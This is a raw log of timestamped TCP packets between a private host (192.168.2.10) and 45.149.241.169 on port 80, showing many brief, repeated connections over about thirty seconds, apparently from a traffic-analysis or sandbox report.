Oct 3, 2024 09:21:43.857913971 CEST	49755	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.858005047 CEST	49755	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:43.862811089 CEST	80	49755	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.005749941 CEST	49756	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.010793924 CEST	80	49756	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.010921955 CEST	49756	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.014039993 CEST	49756	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.018955946 CEST	80	49756	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.019040108 CEST	49756	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.023890972 CEST	80	49756	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.831837893 CEST	80	49756	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.831897974 CEST	80	49756	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.832027912 CEST	49756	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.832067013 CEST	49756	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.836889029 CEST	80	49756	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.987360001 CEST	49757	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.992337942 CEST	80	49757	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.992463112 CEST	49757	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.994793892 CEST	49757	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:44.999596119 CEST	80	49757	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:44.999700069 CEST	49757	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.004978895 CEST	80	49757	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:45.677170038 CEST	80	49757	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:45.677355051 CEST	49757	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.677454948 CEST	80	49757	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:45.677496910 CEST	49757	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.682178020 CEST	80	49757	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:45.828782082 CEST	49758	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.833794117 CEST	80	49758	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:45.833929062 CEST	49758	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.836055040 CEST	49758	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.840900898 CEST	80	49758	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:45.841002941 CEST	49758	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:45.846173048 CEST	80	49758	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:46.484633923 CEST	80	49758	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:46.484698057 CEST	80	49758	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:46.484781981 CEST	49758	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:46.484838009 CEST	49758	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:46.489748001 CEST	80	49758	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:46.628602028 CEST	49759	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:46.633418083 CEST	80	49759	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:46.633517981 CEST	49759	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:46.635745049 CEST	49759	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:46.640500069 CEST	80	49759	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:46.640568972 CEST	49759	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:46.645503044 CEST	80	49759	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:47.380162954 CEST	80	49759	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:47.380192041 CEST	80	49759	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:47.380323887 CEST	49759	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:47.380367994 CEST	49759	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:47.385173082 CEST	80	49759	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:47.527050018 CEST	49760	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:47.531968117 CEST	80	49760	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:47.532110929 CEST	49760	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:47.534284115 CEST	49760	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:47.539062023 CEST	80	49760	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:47.539145947 CEST	49760	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:47.543953896 CEST	80	49760	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:48.314477921 CEST	80	49760	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:48.314513922 CEST	80	49760	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:48.314652920 CEST	49760	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:48.314692020 CEST	49760	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:48.319407940 CEST	80	49760	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:48.473530054 CEST	49761	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:48.478430986 CEST	80	49761	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:48.478523970 CEST	49761	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:48.480703115 CEST	49761	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:48.485495090 CEST	80	49761	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:48.485569954 CEST	49761	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:48.490319014 CEST	80	49761	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:49.257085085 CEST	80	49761	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:49.257121086 CEST	80	49761	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:49.257250071 CEST	49761	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:49.257318020 CEST	49761	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:49.262104988 CEST	80	49761	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:49.412206888 CEST	49762	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:50.344389915 CEST	80	49762	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:50.344558954 CEST	49762	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:50.346766949 CEST	49762	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:50.351711988 CEST	80	49762	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:50.351787090 CEST	49762	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:50.356789112 CEST	80	49762	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.014981031 CEST	80	49762	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.015002012 CEST	80	49762	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.015101910 CEST	49762	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.015151978 CEST	49762	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.019959927 CEST	80	49762	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.151659012 CEST	49763	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.156580925 CEST	80	49763	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.156693935 CEST	49763	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.162585020 CEST	49763	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.167399883 CEST	80	49763	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.167462111 CEST	49763	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.172435045 CEST	80	49763	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.932621002 CEST	80	49763	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.932653904 CEST	80	49763	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:51.932713985 CEST	49763	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.932744026 CEST	49763	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:51.937809944 CEST	80	49763	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.075169086 CEST	49764	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.080090046 CEST	80	49764	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.080236912 CEST	49764	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.082454920 CEST	49764	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.087316036 CEST	80	49764	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.087418079 CEST	49764	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.092314005 CEST	80	49764	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.836091042 CEST	80	49764	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.836194992 CEST	49764	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.836313963 CEST	80	49764	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.836354971 CEST	49764	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.840991974 CEST	80	49764	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.983128071 CEST	49765	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.988477945 CEST	80	49765	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.988651991 CEST	49765	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.990757942 CEST	49765	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:52.996438026 CEST	80	49765	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:52.996562004 CEST	49765	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:53.002101898 CEST	80	49765	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:53.876535892 CEST	80	49765	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:53.876573086 CEST	80	49765	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:53.876769066 CEST	49765	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:53.876769066 CEST	49765	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:53.882421970 CEST	80	49765	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.026567936 CEST	49766	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.032484055 CEST	80	49766	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.032614946 CEST	49766	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.034754038 CEST	49766	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.039623022 CEST	80	49766	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.039700985 CEST	49766	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.045027971 CEST	80	49766	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.812823057 CEST	80	49766	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.813086987 CEST	49766	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.815772057 CEST	80	49766	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.815861940 CEST	49766	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.819508076 CEST	80	49766	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.971643925 CEST	49767	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.976856947 CEST	80	49767	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.977010965 CEST	49767	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.979121923 CEST	49767	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.984179974 CEST	80	49767	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:54.984251976 CEST	49767	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:54.989216089 CEST	80	49767	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:55.759599924 CEST	80	49767	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:55.759856939 CEST	49767	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:55.760169983 CEST	80	49767	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:55.760245085 CEST	49767	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:55.764890909 CEST	80	49767	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:55.899821997 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:55.914454937 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:55.914598942 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:55.920949936 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:55.928740978 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:55.928869009 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:55.935959101 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.049071074 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.049232006 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.049263954 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.049364090 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.049407005 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.049539089 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.049649954 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.049724102 CEST	49768	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.079320908 CEST	80	49768	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.197237968 CEST	49769	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.202317953 CEST	80	49769	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.202413082 CEST	49769	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.204504013 CEST	49769	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.209772110 CEST	80	49769	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:57.209846973 CEST	49769	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:57.217360020 CEST	80	49769	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:58.038119078 CEST	80	49769	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:58.038305044 CEST	49769	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:58.038933992 CEST	80	49769	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:58.038991928 CEST	49769	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:58.045547009 CEST	80	49769	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:58.188126087 CEST	49770	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:58.195477962 CEST	80	49770	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:58.195596933 CEST	49770	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:58.201560020 CEST	49770	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:58.212114096 CEST	80	49770	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:58.212197065 CEST	49770	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:58.219466925 CEST	80	49770	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:59.153633118 CEST	80	49770	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:59.153853893 CEST	49770	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:59.154130936 CEST	80	49770	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:59.154187918 CEST	49770	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:59.158747911 CEST	80	49770	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:59.297410965 CEST	49771	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:59.302650928 CEST	80	49771	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:59.302817106 CEST	49771	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:59.304949045 CEST	49771	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:59.314171076 CEST	80	49771	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:59.314368963 CEST	49771	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:59.321639061 CEST	80	49771	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:00.071734905 CEST	80	49771	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:00.071902990 CEST	49771	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:00.073280096 CEST	80	49771	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:00.073319912 CEST	49771	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:00.077874899 CEST	80	49771	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:00.213042974 CEST	49772	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:00.217972040 CEST	80	49772	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:00.218044996 CEST	49772	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:00.220202923 CEST	49772	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:00.225104094 CEST	80	49772	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:00.225164890 CEST	49772	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:00.230107069 CEST	80	49772	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:01.203999043 CEST	80	49772	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:01.204026937 CEST	80	49772	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:01.204157114 CEST	49772	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:01.209907055 CEST	49772	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:01.217840910 CEST	80	49772	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:01.519675970 CEST	49773	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:01.524750948 CEST	80	49773	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:01.527431965 CEST	49773	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:01.527808905 CEST	49773	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:01.533039093 CEST	80	49773	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:01.533864021 CEST	49773	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:01.539072990 CEST	80	49773	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:02.272135973 CEST	80	49773	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:02.272357941 CEST	49773	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:02.273153067 CEST	80	49773	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:02.273228884 CEST	49773	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:02.282361984 CEST	80	49773	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:02.420166969 CEST	49774	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:02.426484108 CEST	80	49774	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:02.426623106 CEST	49774	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:02.428755045 CEST	49774	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:02.438486099 CEST	80	49774	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:02.438719034 CEST	49774	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:02.445034981 CEST	80	49774	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:03.139327049 CEST	80	49774	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:03.139343977 CEST	80	49774	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:03.139465094 CEST	49774	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:03.139484882 CEST	49774	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:03.145936012 CEST	80	49774	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:03.283117056 CEST	49775	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:03.288279057 CEST	80	49775	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:03.288428068 CEST	49775	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:03.290683031 CEST	49775	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:03.295778990 CEST	80	49775	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:03.295902014 CEST	49775	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:03.300904989 CEST	80	49775	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:08.044234991 CEST	80	49775	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:08.044528961 CEST	49775	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:08.058238983 CEST	80	49775	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:08.058346033 CEST	49775	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:08.182033062 CEST	49776	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:08.187159061 CEST	80	49776	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:08.187367916 CEST	49776	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:08.189498901 CEST	49776	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:08.197041988 CEST	80	49776	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:08.197129965 CEST	49776	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:08.208487034 CEST	80	49776	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:09.291960001 CEST	80	49776	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:09.292300940 CEST	49776	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:09.297981024 CEST	80	49776	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:09.298120022 CEST	49776	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:09.436979055 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:09.442203045 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:09.442349911 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:09.444485903 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:09.449608088 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:09.449762106 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:09.454781055 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.319149017 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.319184065 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.319663048 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.319664001 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.320276976 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.320377111 CEST	49777	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.325676918 CEST	80	49777	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.473104954 CEST	49778	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.490367889 CEST	80	49778	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.490519047 CEST	49778	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.494740963 CEST	49778	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.502831936 CEST	80	49778	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:10.502964020 CEST	49778	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:10.510449886 CEST	80	49778	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:11.227679968 CEST	80	49778	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:11.228003025 CEST	49778	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:11.228059053 CEST	80	49778	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:11.228192091 CEST	49778	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:11.233315945 CEST	80	49778	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:11.376152039 CEST	49779	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:11.381073952 CEST	80	49779	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:11.381201029 CEST	49779	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:11.384141922 CEST	49779	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:11.390882015 CEST	80	49779	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:11.390993118 CEST	49779	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:11.399434090 CEST	80	49779	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:12.130454063 CEST	80	49779	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:12.130536079 CEST	49779	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:12.130609035 CEST	80	49779	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:12.130649090 CEST	49779	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:12.139820099 CEST	80	49779	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:12.277072906 CEST	49780	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:12.282331944 CEST	80	49780	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:12.282479048 CEST	49780	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:12.284667015 CEST	49780	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:12.289658070 CEST	80	49780	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:12.289772987 CEST	49780	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:12.295542955 CEST	80	49780	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:13.082750082 CEST	80	49780	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:13.083004951 CEST	49780	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:13.083586931 CEST	80	49780	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:13.083663940 CEST	49780	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:13.088044882 CEST	80	49780	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:13.239825964 CEST	49781	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:13.248225927 CEST	80	49781	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:13.248344898 CEST	49781	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:13.250464916 CEST	49781	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:13.260094881 CEST	80	49781	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:13.260240078 CEST	49781	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:13.266216040 CEST	80	49781	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:14.029635906 CEST	80	49781	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:14.029912949 CEST	49781	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:14.031173944 CEST	80	49781	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:14.031271935 CEST	49781	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:14.035809040 CEST	80	49781	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:14.169487000 CEST	49782	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:14.175457001 CEST	80	49782	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:14.175595045 CEST	49782	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:14.177622080 CEST	49782	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:14.183172941 CEST	80	49782	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:14.183320045 CEST	49782	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:14.188288927 CEST	80	49782	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:15.259773016 CEST	80	49782	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:15.259916067 CEST	49782	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:15.260253906 CEST	80	49782	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:15.260368109 CEST	49782	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:15.264705896 CEST	80	49782	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:15.407639980 CEST	49783	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:15.417237997 CEST	80	49783	45.149.241.169	192.168.2.10
